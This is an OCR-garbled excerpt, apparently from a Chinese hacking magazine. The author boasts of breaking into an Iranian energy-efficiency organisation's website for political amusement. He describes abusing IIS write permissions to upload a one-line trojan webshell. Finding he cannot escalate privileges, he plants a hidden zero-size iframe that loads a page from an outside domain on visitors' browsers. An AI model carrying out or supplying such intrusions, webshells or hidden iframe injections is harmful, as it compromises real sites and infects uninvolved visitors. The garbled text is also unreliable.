如发现有乱码，请点击下面链接浏览原文
正文摘录:

一分钟轻松入侵稻草人伊朗能源效率组织”网站昨天在看电视的时候.看到说伊朗的核问题似乎又闹得挺紧张的，唉。地球太危险，有机会还是快回火星吧!这美国佬也是，自己这么多的核弹和核电站不说，这印度和巴基斯坦可以拥有核弹，为什么伊朗就不行?这不摆明了是只许州官放火，不许百姓点灯嘛!不过.话又说回来，这伊斯兰兄弟别看嘴上叫的硬，可万一真的动起手来，就很难说怎么样了。这网络上的较量也是一样，于是我决定先动动手，测试一下伊朗兄弟的网站。打开IE搜索起伊朗的IP地址来，没多久就找到圈2浏览了整个网站后我才发现居然使用的全都是静态网页。晕了，这可怎么办啊?要是入侵不了，岂不是自己太没有面子了。我把目前常用的入侵方式都试了一遍.包括社会工程学、upfile.asp上传漏洞等等，都没有发现可以获取webshell的方法.极度郁闷，于是就去了几个安全论坛转了一圈，无意中让我找到了一种方法一一网站IIs写权限利用。不管行不行，死马当成活马医，姑且试一试。没想到的是对方居然真的存在这个漏洞，如图2(小编注：关于IIs写权限利用的详细利用文章，小菜们可以参考以前的x档案)。哈哈，有的玩了。利用11s写权限利用工具很轻松的就写入了一句话木马，然后使用一句话木马客户端连接上去，可以浏览了，如图3.图4。图3图4得到webshell后，发现权限比较低，也没有安装ServU、pcanywhere等常见的可以用于提权的软件.没法进一步入侵了。但既然进来了，也不能便宜了它，挂上了一串代码<ifr-m·-rc=”httP：／／.-t····.mmiyy.cn／ind·舞.htmI”wjdth：”O”height=”0”>来帮